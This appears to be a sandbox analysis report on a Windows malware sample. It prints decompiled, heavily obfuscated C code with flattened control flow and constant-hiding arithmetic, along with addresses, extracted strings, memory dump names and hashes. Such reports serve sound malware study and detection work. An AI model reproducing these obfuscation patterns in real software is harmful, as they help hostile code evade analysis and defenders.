				 *(_t950 + 0x28) =  *(_t950 + 0x28) ^ 0x62eeb120;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) * 0x3c;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) + 0xc705;
				 *(_t950 + 0x28) =  *(_t950 + 0x28) ^ 0x2fee2b8f;
				 *(_t950 + 0x40) = 0x14c1;
				 *(_t950 + 0x40) =  *(_t950 + 0x40) | 0xecde44ed;
				_t928 = 0x27;
				 *(_t950 + 0x44) =  *(_t950 + 0x40) / _t928;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) >> 6;
				 *(_t950 + 0x44) =  *(_t950 + 0x44) ^ 0x00184119;
				 *(_t950 + 0x3c) = 0x8f59;
				 *(_t950 + 0x3c) =  *(_t950 + 0x3c) << 9;
				_t929 = 7;
				 *(_t950 + 0x3c) =  *(_t950 + 0x3c) / _t929;
				_t930 = 0x30;
				 *(_t950 + 0x3c) =  *(_t950 + 0x3c) / _t930;
				 *(_t950 + 0x3c) =  *(_t950 + 0x3c) ^ 0x00009f8e;
				 *(_t950 + 0x108) = 0x8114;
				 *(_t950 + 0x108) =  *(_t950 + 0x108) + 0xffffe072;
				 *(_t950 + 0x108) =  *(_t950 + 0x108) ^ 0x00007574;
				 *(_t950 + 0x68) = 0x1eec;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) >> 5;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) << 9;
				 *(_t950 + 0x68) =  *(_t950 + 0x68) ^ 0x0001b084;
				 *(_t950 + 0x64) = 0x2753;
				 *(_t950 + 0x64) =  *(_t950 + 0x64) ^ 0x81763235;
				 *(_t950 + 0x64) =  *(_t950 + 0x64) << 3;
				 *(_t950 + 0x64) =  *(_t950 + 0x64) ^ 0x0bb0ddd8;
				 *(_t950 + 0x1c) = 0xf5b7;
				 *(_t950 + 0x1c) =  *(_t950 + 0x1c) | 0x35534ee5;
				 *(_t950 + 0x1c) =  *(_t950 + 0x1c) >> 9;
				 *(_t950 + 0x1c) =  *(_t950 + 0x1c) >> 7;
				 *(_t950 + 0x1c) =  *(_t950 + 0x1c) ^ 0x00003d7d;
				 *(_t950 + 0x38) = 0x2f43;
				_t931 = 0x4b;
				 *(_t950 + 0x38) =  *(_t950 + 0x38) / _t931;
				_t932 = 0x3a;
				 *(_t950 + 0x38) =  *(_t950 + 0x38) / _t932;
				 *(_t950 + 0x38) =  *(_t950 + 0x38) + 0xffff5ca5;
				 *(_t950 + 0x38) =  *(_t950 + 0x38) ^ 0xffff1d3e;
				 *(_t950 + 0xf8) = 0xec82;
				 *(_t950 + 0xf8) =  *(_t950 + 0xf8) + 0x609d;
				 *(_t950 + 0xf8) =  *(_t950 + 0xf8) ^ 0x00011376;
				 *(_t950 + 0x94) = 0xef51;
				_t933 = 0x32;
				 *(_t950 + 0x94) =  *(_t950 + 0x94) / _t933;
				_t934 = 0x11;
				 *(_t950 + 0x90) =  *(_t950 + 0x94) * 0x31;
				 *(_t950 + 0x90) =  *(_t950 + 0x90) ^ 0x00009894;
				 *(_t950 + 0xc8) = 0xb312;
				 *(_t950 + 0xc8) =  *(_t950 + 0xc8) << 0xd;
				 *(_t950 + 0xc8) =  *(_t950 + 0xc8) ^ 0x16624d53;
				 *(_t950 + 0x98) = 0x3fa5;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) + 0x4ab7;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) + 0xffffdc08;
				 *(_t950 + 0x98) =  *(_t950 + 0x98) ^ 0x000078cc;
				 *(_t950 + 0x50) = 0xcffd;
				 *(_t950 + 0x50) =  *(_t950 + 0x50) / _t934;
				 *(_t950 + 0x50) =  *(_t950 + 0x50) | 0x42e0f56c;
				 *(_t950 + 0x50) =  *(_t950 + 0x50) + 0x6d22;
				 *(_t950 + 0x50) =  *(_t950 + 0x50) ^ 0x42e14cb6;
				 *(_t950 + 0xd8) = 0x2cbc;
				 *(_t950 + 0xd8) =  *(_t950 + 0xd8) ^ 0xb4586e51;
				 *(_t950 + 0xd8) =  *(_t950 + 0xd8) ^ 0xb45852ed;
				 *(_t950 + 0x48) = 0xee7b;
				 *(_t950 + 0x48) =  *(_t950 + 0x48) << 0xd;
				 *(_t950 + 0x48) =  *(_t950 + 0x48) << 9;
				 *(_t950 + 0x48) =  *(_t950 + 0x48) | 0xafcc7f53;
				 *(_t950 + 0x48) =  *(_t950 + 0x48) ^ 0xbfcc5369;
				 *(_t950 + 0xd0) = 0xc42e;
				 *(_t950 + 0xd0) =  *(_t950 + 0xd0) | 0xd678f7f1;
				 *(_t950 + 0xd0) =  *(_t950 + 0xd0) ^ 0xd678b2fb;
				 *(_t950 + 0xcc) = 0xa2cf;
				 *(_t950 + 0xcc) =  *(_t950 + 0xcc) ^ 0x45343d70;
				 *(_t950 + 0xcc) =  *(_t950 + 0xcc) ^ 0x4534d4ad;
				 *(_t950 + 0x11c) = 0xb9db;
				 *(_t950 + 0x11c) =  *(_t950 + 0x11c) + 0xffff1101;
				 *(_t950 + 0x11c) =  *(_t950 + 0x11c) ^ 0xffffae8b;
				 *(_t950 + 0x88) = 0xfaa3;
				 *(_t950 + 0x88) =  *(_t950 + 0x88) << 6;
				 *(_t950 + 0x88) =  *(_t950 + 0x88) + 0xcdb3;
				 *(_t950 + 0x88) =  *(_t950 + 0x88) ^ 0x003f3af5;
				 *(_t950 + 0xc0) = 0xa294;
				_t935 = 0x7e;
				 *(_t950 + 0xc0) =  *(_t950 + 0xc0) / _t935;
				 *(_t950 + 0xc0) =  *(_t950 + 0xc0) ^ 0xb019d3d1;
				 *(_t950 + 0xc0) =  *(_t950 + 0xc0) ^ 0xb019fef7;
				 *(_t950 + 0x80) = 0xa0b2;
				 *(_t950 + 0x80) =  *(_t950 + 0x80) << 1;
				 *(_t950 + 0x80) =  *(_t950 + 0x80) << 3;
				 *(_t950 + 0x80) =  *(_t950 + 0x80) ^ 0x000a45e8;
				 *(_t950 + 0x74) = 0x61f;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) + 0xffff105e;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) << 2;
				 *(_t950 + 0x74) =  *(_t950 + 0x74) ^ 0xfffc558b;
				 *(_t950 + 0x1c) = 0xc0d2;
				 *(_t950 + 0x20) =  *(_t950 + 0x1c) / _t804;
				 *(_t950 + 0x20) =  *(_t950 + 0x20) + 0xffff43f4;
				 *(_t950 + 0x20) =  *(_t950 + 0x20) + 0xffff6466;
				 *(_t950 + 0x20) =  *(_t950 + 0x20) ^ 0xfffed62d;
				 *(_t950 + 0x70) = 0xbc2e;
				 *(_t950 + 0x70) =  *(_t950 + 0x70) >> 0xa;
				_t936 = 0x17;
				 *(_t950 + 0x70) =  *(_t950 + 0x70) / _t936;
				 *(_t950 + 0x70) =  *(_t950 + 0x70) ^ 0x00000c9d;
				 *(_t950 + 0xfc) = 0xf001;
				_t937 = 0x14;
				 *(_t950 + 0xf8) =  *(_t950 + 0xfc) * 0x7c;
				 *(_t950 + 0xf8) =  *(_t950 + 0xf8) ^ 0x0074021d;
				 *(_t950 + 0xc4) = 0x7c98;
				 *(_t950 + 0xc4) =  *(_t950 + 0xc4) << 9;
				 *(_t950 + 0xc4) =  *(_t950 + 0xc4) ^ 0x2380f655;
				 *(_t950 + 0xc4) =  *(_t950 + 0xc4) ^ 0x2379c4d7;
				 *(_t950 + 0xbc) = 0xfd89;
				 *(_t950 + 0xbc) =  *(_t950 + 0xbc) + 0xffff54c6;
				 *(_t950 + 0xbc) =  *(_t950 + 0xbc) / _t937;
				 *(_t950 + 0xbc) =  *(_t950 + 0xbc) ^ 0x00005764;
				_t805 =  *(_t950 + 0x13c);
				 *(_t950 + 0x10) =  *(_t950 + 0x140);
				while(1) {
					L1:
					_t896 =  *(_t950 + 0x14);
					while(1) {
						L2:
						while(1) {
							L3:
							_t954 = _t806 - 0x1dc05553;
							if(_t954 > 0) {
								goto L27;
							}
							L4:
							if(_t954 == 0) {
								_push( *((intOrPtr*)(_t950 + 0x120)));
								E002429E3(_t950 + 0x274, 0x400, E0025889D(0x25c6a0,  *(_t950 + 0x24), __eflags),  *(_t950 + 0x140),  *(_t950 + 0x44),  *(_t950 + 0x10c), _t950 + 0x17c, _t950 + 0x478,  *(_t950 + 0x80),  *(_t950 + 0x28));
								_t950 = _t950 + 0x24;
								E00252025( *(_t950 + 0x48), _t760,  *(_t950 + 0x3c),  *((intOrPtr*)(_t950 + 0x104)));
								_t751 =  *(_t950 + 0x18);
								_t806 = 0x23448a49;
								while(1) {
									L1:
									_t896 =  *(_t950 + 0x14);
									goto L2;
								}
							} else {
								_t955 = _t806 - 0x160634a6;
								if(_t955 > 0) {
									__eflags = _t806 - 0x16d97506;
									if(_t806 == 0x16d97506) {
										E0024F536( *(_t950 + 0x7c),  *(_t950 + 0x24),  *(_t950 + 0x70),  *((intOrPtr*)(_t950 + 0x144)));
										_t806 = 0x36d580c3;
										goto L13;
									} else {
										__eflags = _t806 - 0x1a0940a4;
										if(_t806 == 0x1a0940a4) {
											E0024839D(_t950 + 0x170, _t917);
											_t806 = 0x1dc05553;
											goto L13;
										} else {
											__eflags = _t806 - 0x1a22d724;
											if(_t806 != 0x1a22d724) {
												goto L44;
											} else {
												 *(_t950 + 0x138) =  *(_t950 + 0x138) & 0x00000000;
												 *(_t950 + 0x140) =  *(_t950 + 0x140) & 0x00000000;
												_t832 = _t950 + 0x13c;
												E0024C769(_t832, _t950 + 0x170,  *(_t950 + 0x88),  *(_t950 + 0x80), _t950 + 0x20c,  *(_t950 + 0x30), _t896, _t950 + 0x280, _t950 + 0x474,  *(_t950 + 0x3c),  *(_t950 + 0xf8),  *(_t950 + 0x90));
												_t950 = _t950 + 0x28;
												asm("sbb ecx, ecx");
												_t806 = (_t832 & 0xd5e50b3a) + 0x355eeb92;
												goto L13;
											}
										}
									}
								} else {
									if(_t955 == 0) {
										 *(_t950 + 0x160) = _t751;
										 *((intOrPtr*)(_t950 + 0x15c)) = 1;
										 *(_t950 + 0x160) = _t805;
										E002496CD(_t950 + 0x148,  *((intOrPtr*)(_t950 + 0xac)), _t950 + 0x158,  *(_t950 + 0x118));
										_pop(_t836);
										asm("sbb ecx, ecx");
										_t806 = (_t836 & 0x02a7bfa7) + 0x36d580c3;
										goto L13;
									} else {
										if(_t806 == 0x6ef04) {
											E0024F536( *(_t950 + 0x90),  *(_t950 + 0xc8),  *(_t950 + 0x84),  *(_t950 + 0x13c));
											_t806 = 0x16d97506;
											goto L13;
										} else {
											if(_t806 == 0x9a9cbcb) {
												_push(_t806);
												_push( *((intOrPtr*)(_t917 + 4)));
												_t941 = E002578B7(_t806);
												_t951 = _t950 + 4;
												_t805 = E00248736(_t780);
												__eflags = _t805;
												if(__eflags != 0) {
													_t751 = E00256B8A(_t941,  *((intOrPtr*)(_t951 + 0x58)), __eflags,  *((intOrPtr*)(_t951 + 0xfc)), _t805,  *_t917,  *((intOrPtr*)(_t951 + 0x30)),  *((intOrPtr*)(_t917 + 4)));
													_t950 = _t951 + 0x14;
													 *(_t950 + 0x10) = _t751;
													__eflags = _t751;
													if(__eflags == 0) {
														_push(_t805);
														_push( *(_t950 + 0xec));
														_t903 =  *(_t950 + 0xf8);
														_t817 =  *(_t950 + 0xbc);
														L48:
														E0024F536(_t817, _t903);
													} else {
														_t806 = 0x160634a6;
														while(1) {
															L1:
															_t896 =  *(_t950 + 0x14);
															goto L2;
														}
													}
												}
											} else {
												if(_t806 == 0xb43f6cc) {
													__eflags = E00259B45( *((intOrPtr*)(_t950 + 0xc74)),  *(_t950 + 0xd0),  *(_t950 + 0x9c), _t950 + 0x134);
													_t946 =  !=  ? 1 : _t946;
													_t806 = 0x2a19e3bf;
													 *(_t950 + 0x130) = _t946;
													L13:
													_t751 =  *(_t950 + 0x10);
													goto L14;
												} else {
													_t959 = _t806 - 0x13765d88;
													if(_t806 != 0x13765d88) {
														L44:
														__eflags = _t806 - 0x1a8884c7;
														if(__eflags != 0) {
															L14:
															_t896 =  *(_t950 + 0x14);
															continue;
														}
													} else {
														_push( *(_t950 + 0x108));
														_t787 = E0025889D(0x25c660,  *(_t950 + 0xa8), _t959);
														_t788 =  *0x25ca38; // 0x0
														_t790 =  *0x25ca38; // 0x0
														_t793 =  *0x25ca38; // 0x0
														E00257C6E(( *_t788)[2] & 0x000000ff, _t959,  *_t788, ( *_t788)[3] & 0x000000ff,  *(_t950 + 0x88),  *( *_t793) & 0x000000ff,  *(_t950 + 0xd0), ( *_t790)[1] & 0x000000ff,  *(_t950 + 0x110),  *(_t950 + 0x60),  *(_t950 + 0xdc),  *(_t950 + 0x118), _t950 + 0x1f0);
														_t950 = _t950 + 0x2c;
														E00252025( *(_t950 + 0xe4), _t787,  *(_t950 + 0x28),  *(_t950 + 0x3c));
														_t799 =  *0x25ca38; // 0x0
														_t806 = 0x261be6d7;
														_t896 = ( *_t799)[4] & 0x0000ffff;
														_t751 =  *(_t950 + 0x10);
														 *(_t950 + 0x14) = ( *_t799)[4] & 0x0000ffff;
														L2:
														L3:
														_t954 = _t806 - 0x1dc05553;
														if(_t954 > 0) {
															goto L27;
														}
													}
												}
											}
										}
									}
								}
							}
							L49:
							return _t946;
							L27:
							__eflags = _t806 - 0x23448a49;
							if(_t806 == 0x23448a49) {
								__eflags = E0025511B(_t950 + 0x140, _t950 + 0x174, _t950 + 0x14c);
								if(__eflags == 0) {
									_t806 = 0x6ef04;
									goto L44;
								} else {
									_t806 = 0x1a22d724;
									goto L13;
								}
							} else {
								__eflags = _t806 - 0x261be6d7;
								if(_t806 == 0x261be6d7) {
									_t918 = _t950 + 0x270;
									_t809 = 6;
									_t948 =  *(_t950 + 0x12c) % _t809 + 1;
									__eflags = _t948;
									while(__eflags != 0) {
										_t945 = ( *(_t950 + 0x130) & 0x0000000f) + 4;
										E0024D6C9( *(_t950 + 0x68), _t918, 1, _t945,  *(_t950 + 0xe8), _t950 + 0x130,  *((intOrPtr*)(_t950 + 0x58)));
										_t950 = _t950 + 0x18;
										_t919 = _t918 + _t945 * 2;
										_t803 = 0x2f;
										 *_t919 = _t803;
										_t918 = _t919 + 2;
										_t948 = _t948 - 1;
										__eflags = _t948;
									}
									_t946 =  *(_t950 + 0x130);
									 *_t918 = 0;
									_t806 = 0x1a0940a4;
									_t917 =  *((intOrPtr*)(_t950 + 0xc78));
									goto L1;
								} else {
									__eflags = _t806 - 0x2a19e3bf;
									if(_t806 == 0x2a19e3bf) {
										E0024F536( *((intOrPtr*)(_t950 + 0x58)),  *((intOrPtr*)(_t950 + 0xe0)),  *(_t950 + 0x4c),  *((intOrPtr*)(_t950 + 0x134)));
										_t806 = 0x355eeb92;
										goto L13;
									} else {
										__eflags = _t806 - 0x2ca20b85;
										if(_t806 == 0x2ca20b85) {
											 *(_t950 + 0x12c) = E00258C8F(_t806);
											_t806 = 0x9a9cbcb;
											goto L13;
										} else {
											__eflags = _t806 - 0x355eeb92;
											if(_t806 == 0x355eeb92) {
												E0024F536( *(_t950 + 0xd8),  *(_t950 + 0xd4),  *((intOrPtr*)(_t950 + 0x120)),  *((intOrPtr*)(_t950 + 0x14c)));
												_t806 = 0x6ef04;
												goto L13;
											} else {
												__eflags = _t806 - 0x36d580c3;
												if(_t806 == 0x36d580c3) {
													_push(_t805);
													_push( *(_t950 + 0xc0));
													_t903 =  *(_t950 + 0xcc);
													_t817 =  *(_t950 + 0x100);
													goto L48;
												} else {
													__eflags = _t806 - 0x397d406a;
													if(_t806 != 0x397d406a) {
														goto L44;
													} else {
														_t820 =  *(_t950 + 0x118);
														E0024F98C(_t950 + 0x14c, _t950 + 0x140,  *(_t950 + 0x94),  *((intOrPtr*)(_t950 + 0x128)),  *(_t950 + 0x84));
														_t950 = _t950 + 0x10;
														asm("sbb ecx, ecx");
														_t806 = (_t820 & 0xfc9ce882) + 0x16d97506;
														goto L13;
													}
												}
											}
										}
									}
								}
							}
							goto L49;
						}
					}
				}
			}

0x00249fe6
0x00249fed
0x00249ff6
0x00249ffe
0x0024a005
0x0024a006
0x0024a00d
0x0024a00e
0x0024a00f
0x0024a014
0x0024a01f
0x0024a022
0x0024a02d
0x0024a02f
0x0024a038
0x0024a043
0x0024a048
0x0024a053
0x0024a067
0x0024a06c
0x0024a075
0x0024a080
0x0024a092
0x0024a097
0x0024a0a0
0x0024a0ab
0x0024a0b6
0x0024a0be
0x0024a0c6
0x0024a0ce
0x0024a0d9
0x0024a0e4
0x0024a0ec
0x0024a0f7
0x0024a102
0x0024a10d
0x0024a118
0x0024a120
0x0024a129
0x0024a12e
0x0024a134
0x0024a13c
0x0024a147
0x0024a152
0x0024a15a
0x0024a165
0x0024a177
0x0024a17a
0x0024a181
0x0024a188
0x0024a193
0x0024a19b
0x0024a1a0
0x0024a1a8
0x0024a1b0
0x0024a1b8
0x0024a1c0
0x0024a1ca
0x0024a1ce
0x0024a1d4
0x0024a1dc
0x0024a1e7
0x0024a1ef
0x0024a1fa
0x0024a202
0x0024a206
0x0024a20a
0x0024a20f
0x0024a217
0x0024a222
0x0024a22a
0x0024a232
0x0024a23d
0x0024a248
0x0024a253
0x0024a25e
0x0024a269
0x0024a271
0x0024a27c
0x0024a287
0x0024a292
0x0024a29a
0x0024a2a5
0x0024a2b0
0x0024a2bb
0x0024a2c6
0x0024a2db
0x0024a2de
0x0024a2df
0x0024a2e6
0x0024a2f1
0x0024a2fc
0x0024a304
0x0024a30c
0x0024a317
0x0024a32a
0x0024a331
0x0024a33c
0x0024a352
0x0024a359
0x0024a364
0x0024a36f
0x0024a382
0x0024a389
0x0024a394
0x0024a39f
0x0024a3aa
0x0024a3b2
0x0024a3bd
0x0024a3c5
0x0024a3cd
0x0024a3d2
0x0024a3da
0x0024a3e5
0x0024a3f0
0x0024a3fb
0x0024a406
0x0024a411
0x0024a41c
0x0024a427
0x0024a42f
0x0024a434
0x0024a43c
0x0024a444
0x0024a44c
0x0024a460
0x0024a467
0x0024a472
0x0024a47d
0x0024a487
0x0024a492
0x0024a49d
0x0024a4a5
0x0024a4b0
0x0024a4be
0x0024a4c3
0x0024a4ce
0x0024a4d1
0x0024a4d5
0x0024a4da
0x0024a4e2
0x0024a4ea
0x0024a4f2
0x0024a4f7
0x0024a4ff
0x0024a507
0x0024a512
0x0024a51a
0x0024a525
0x0024a530
0x0024a538
0x0024a53d
0x0024a545
0x0024a54d
0x0024a558
0x0024a563
0x0024a56e
0x0024a57e
0x0024a582
0x0024a58a
0x0024a58e
0x0024a596
0x0024a59e
0x0024a5a6
0x0024a5ab
0x0024a5b3
0x0024a5bb
0x0024a5c6
0x0024a5d1
0x0024a5dc
0x0024a5e7
0x0024a5f2
0x0024a5fd
0x0024a609
0x0024a60c
0x0024a610
0x0024a618
0x0024a61d
0x0024a625
0x0024a638
0x0024a63f
0x0024a64a
0x0024a652
0x0024a657
0x0024a65c
0x0024a664
0x0024a66c
0x0024a679
0x0024a67d
0x0024a685
0x0024a68d
0x0024a695
0x0024a6a5
0x0024a6aa
0x0024a6b0
0x0024a6b5
0x0024a6bd
0x0024a6c5
0x0024a6ce
0x0024a6d3
0x0024a6dd
0x0024a6e2
0x0024a6e8
0x0024a6f0
0x0024a6fb
0x0024a706
0x0024a711
0x0024a719
0x0024a71e
0x0024a723
0x0024a72b
0x0024a733
0x0024a73b
0x0024a740
0x0024a748
0x0024a750
0x0024a758
0x0024a75d
0x0024a762
0x0024a76a
0x0024a776
0x0024a77b
0x0024a785
0x0024a78a
0x0024a790
0x0024a798
0x0024a7a0
0x0024a7ab
0x0024a7b6
0x0024a7c1
0x0024a7d3
0x0024a7d8
0x0024a7e9
0x0024a7ea
0x0024a7f1
0x0024a7fc
0x0024a807
0x0024a80f
0x0024a81a
0x0024a825
0x0024a830
0x0024a83b
0x0024a846
0x0024a854
0x0024a858
0x0024a860
0x0024a868
0x0024a872
0x0024a87d
0x0024a888
0x0024a893
0x0024a89b
0x0024a8a0
0x0024a8a5
0x0024a8ad
0x0024a8b5
0x0024a8c0
0x0024a8cb
0x0024a8d6
0x0024a8e1
0x0024a8ec
0x0024a8f7
0x0024a902
0x0024a90d
0x0024a918
0x0024a923
0x0024a92b
0x0024a936
0x0024a941
0x0024a955
0x0024a95a
0x0024a961
0x0024a96c
0x0024a977
0x0024a982
0x0024a989
0x0024a991
0x0024a99c
0x0024a9a4
0x0024a9ac
0x0024a9b1
0x0024a9b9
0x0024a9c9
0x0024a9cf
0x0024a9d7
0x0024a9df
0x0024a9e7
0x0024a9ef
0x0024a9f8
0x0024a9fd
0x0024aa03
0x0024aa0b
0x0024aa1e
0x0024aa1f
0x0024aa26
0x0024aa31
0x0024aa3c
0x0024aa44
0x0024aa4f
0x0024aa5a
0x0024aa65
0x0024aa79
0x0024aa80
0x0024aa92
0x0024aa99
0x0024aa9d
0x0024aa9d
0x0024aa9d
0x0024aaa1
0x0024aaa1
0x0024aaa4
0x0024aaa4
0x0024aaa4
0x0024aaaa
0x00000000
0x00000000
0x0024aab0
0x0024aab0
0x0024adbb
0x0024ae14
0x0024ae19
0x0024ae2d
0x0024ae32
0x0024ae38
0x0024aa9d
0x0024aa9d
0x0024aa9d
0x00000000
0x0024aa9d
0x0024aab6
0x0024aab6
0x0024aabc
0x0024ace5
0x0024aceb
0x0024adaa
0x0024adb1
0x00000000
0x0024acf1
0x0024acf1
0x0024acf7
0x0024ad88
0x0024ad8d
0x00000000
0x0024acfd
0x0024acfd
0x0024ad03
0x00000000
0x0024ad09
0x0024ad10
0x0024ad26
0x0024ad2e
0x0024ad64
0x0024ad69
0x0024ad6e
0x0024ad76
0x00000000
0x0024ad76
0x0024ad03
0x0024acf7
0x0024aac2
0x0024aac2
0x0024acac
0x0024acbb
0x0024acc2
0x0024acc9
0x0024acd1
0x0024acd2
0x0024acda
0x00000000
0x0024aac8
0x0024aace
0x0024ac86
0x0024ac8d
0x00000000
0x0024aad4
0x0024aada
0x0024ac01
0x0024ac02
0x0024ac0b
0x0024ac0d
0x0024ac29
0x0024ac2d
0x0024ac2f
0x0024ac4c
0x0024ac51
0x0024ac54
0x0024ac58
0x0024ac5a
0x0024b013
0x0024b014
0x0024b01b
0x0024b022
0x0024b041
0x0024b041
0x0024ac60
0x0024ac60
0x0024aa9d
0x0024aa9d
0x0024aa9d
0x00000000
0x0024aa9d
0x0024aa9d
0x0024ac5a
0x0024aae0
0x0024aae6
0x0024abcb
0x0024abcf
0x0024abd2
0x0024abd7
0x0024abde
0x0024abde
0x00000000
0x0024aaec
0x0024aaec
0x0024aaf2
0x0024b006
0x0024b006
0x0024b00c
0x0024abe2
0x0024abe2
0x00000000
0x0024abe2
0x0024aaf8
0x0024aaf8
0x0024ab0b
0x0024ab12
0x0024ab3b
0x0024ab4e
0x0024ab6c
0x0024ab71
0x0024ab85
0x0024ab8a
0x0024ab91
0x0024ab98
0x0024ab9c
0x0024aba0
0x0024aaa1
0x0024aaa4
0x0024aaa4
0x0024aaaa
0x00000000
0x00000000
0x0024aaaa
0x0024aaf2
0x0024aae6
0x0024aada
0x0024aace
0x0024aac2
0x0024aabc
0x0024b04a
0x0024b054
0x0024ae42
0x0024ae42
0x0024ae48
0x0024afef
0x0024aff1
0x0024b001
0x00000000
0x0024aff3
0x0024aff3
0x00000000
0x0024aff3
0x0024ae4e
0x0024ae4e
0x0024ae54
0x0024af59
0x0024af64
0x0024af69
0x0024af69
0x0024af6a
0x0024af94
0x0024af9b
0x0024afa0
0x0024afa3
0x0024afa8
0x0024afa9
0x0024afac
0x0024afaf
0x0024afaf
0x0024afaf
0x0024afb2
0x0024afbb
0x0024afbe
0x0024afc7
0x00000000
0x0024ae5a
0x0024ae5a
0x0024ae60
0x0024af41
0x0024af48
0x00000000
0x0024ae66
0x0024ae66
0x0024ae6c
0x0024af1a
0x0024af21
0x00000000
0x0024ae72
0x0024ae72
0x0024ae78
0x0024aef6
0x0024aefd
0x00000000
0x0024ae7a
0x0024ae7a
0x0024ae80
0x0024b02b
0x0024b02c
0x0024b033
0x0024b03a
0x00000000
0x0024ae86
0x0024ae86
0x0024ae8c
0x00000000
0x0024ae92
0x0024aeb5
0x0024aebd
0x0024aec2
0x0024aec7
0x0024aecf
0x00000000
0x0024aecf
0x0024ae8c
0x0024ae80
0x0024ae78
0x0024ae6c
0x0024ae60
0x0024ae54
0x00000000
0x0024ae48
0x0024aaa4
0x0024aaa1

Strings

#}, xrefs: 0024A507
nXj, xrefs: 0024A014
./, xrefs: 0024A492
KZ, xrefs: 0024A5DC
jg, xrefs: 0024A165
m9, xrefs: 0024A61D
w, xrefs: 0024A44C
E, xrefs: 0024A991
S', xrefs: 0024A72B
}=, xrefs: 0024A762
{, xrefs: 0024A893
C/, xrefs: 0024A76A
=;, xrefs: 0024A102
j@}9, xrefs: 0024AE86
Q[, xrefs: 0024A188
Q, xrefs: 0024A7C1
Lf, xrefs: 0024A625
p=4E, xrefs: 0024A8E1
Z9, xrefs: 0024A427
25, xrefs: 0024A33C
<8, xrefs: 0024A134
M#, xrefs: 0024A0EC
tu, xrefs: 0024A706
cA, xrefs: 0024A15A
5a, xrefs: 0024A5FD
dW, xrefs: 0024AA80
%, xrefs: 0024A3BD
"m, xrefs: 0024A860
q, xrefs: 0024A4DA
NS5, xrefs: 0024A750
m, xrefs: 0024A10D

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: "m$#}$%$./$25$5a$<8$=;$C/$KZ$Lf$M#$Q[$Q$S'$Z9$cA$dW$j@}9$jg$m$m9$nXj$p=4E$tu${$}=$E$NS5$q$w
API String ID: 0-3061497230
Opcode ID: 21ffd29eeabb18fc047893fcb34a9ab187bee1d2beec20273b5afc659396c1e1
Instruction ID: 0f73764c57521eaefc4f01b1a0b397bbaf5c089fa1ec69c030f7384c68fe917c
Opcode Fuzzy Hash: 21ffd29eeabb18fc047893fcb34a9ab187bee1d2beec20273b5afc659396c1e1
Instruction Fuzzy Hash: E982247151C3818BE378CF25C589B9BBBE1FBC4318F10891DE19A862A0DBB59959CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0024C769, Relevance: 24.4, Strings: 19, Instructions: 630
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E0024C769(intOrPtr __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed int _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				char _v4;
				char _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				unsigned int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				intOrPtr _v316;
				char _v320;
				intOrPtr _t666;
				intOrPtr _t667;
				intOrPtr _t672;
				void* _t679;
				intOrPtr _t680;
				intOrPtr _t687;
				intOrPtr _t689;
				intOrPtr _t693;
				intOrPtr* _t694;
				signed int _t706;
				intOrPtr _t707;
				void* _t712;
				intOrPtr _t718;
				void* _t758;
				signed int _t773;
				signed int _t774;
				signed int _t775;
				signed int _t776;
				signed int _t777;
				signed int _t778;
				signed int _t779;
				signed int _t780;
				signed int _t781;
				signed int _t782;
				signed int _t783;
				signed int _t784;
				intOrPtr _t785;
				signed int _t786;
				intOrPtr _t788;
				char _t793;
				void* _t795;
				void* _t797;

				_t694 = __edx;
				_push(_a40);
				_push(_a36);
				_v20 = __ecx;
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(_a20 & 0x0000ffff);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0024602B(_a20 & 0x0000ffff);
				_v12 = 0x78501c;
				_v24 = 0;
				_v8 = 0;
				_t793 = 0;
				_v4 = 0;
				_t795 =  &_v320 + 0x30;
				_v232 = 0x7906;
				_t786 = 0xcd25e5e;
				_v232 = _v232 << 6;
				_v232 = _v232 >> 0xa;
				_v232 = _v232 ^ 0x00000790;
				_v156 = 0xf83b;
				_v156 = _v156 >> 0xb;
				_v156 = _v156 ^ 0x0000000c;
				_v52 = 0x2ceb;
				_v52 = _v52 | 0xa5610ac4;
				_v52 = _v52 ^ 0xa5612e27;
				_v208 = 0x96db;
				_v208 = _v208 + 0xffffce2c;
				_v208 = _v208 | 0x71346f29;
